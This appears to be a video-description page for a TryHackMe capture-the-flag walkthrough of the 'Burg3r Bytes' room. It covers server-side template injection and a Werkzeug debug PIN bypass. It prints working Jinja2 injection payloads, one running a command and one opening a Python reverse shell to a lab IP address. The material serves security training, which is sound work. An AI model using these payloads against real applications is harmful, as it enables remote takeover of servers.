🍔🍔🍔🔔 TryHack3M: Burg3r Bytes TryHackMe walk through 🍔🍔🔔🔔

Описание к видео 🍔🍔🍔🔔 TryHack3M: Burg3r Bytes TryHackMe walk through 🍔🍔🔔🔔

🍔 They say these burgers are worth every penny. Can you buy one?

Room link: https://tryhackme.com/r/room/burg3rbytes

🍔🍔 SSTI (Server Side Template Injection)

https://book.hacktricks.xyz/pentestin...

🍔🍔 Werkzeug Debug Console Pin Bypass

https://github.com/wdahlenburg/werkze...

🍔🍔 RCE:

{{ cycler.__init__.__globals__.os.popen('id').read() }}

🍔🍔 reverse shell:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.251.198\",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'")}}{%endif%}{% endfor %}

🍔🍔

#tryhackme

Комментарии

Информация по комментариям в разработке

Похожие видео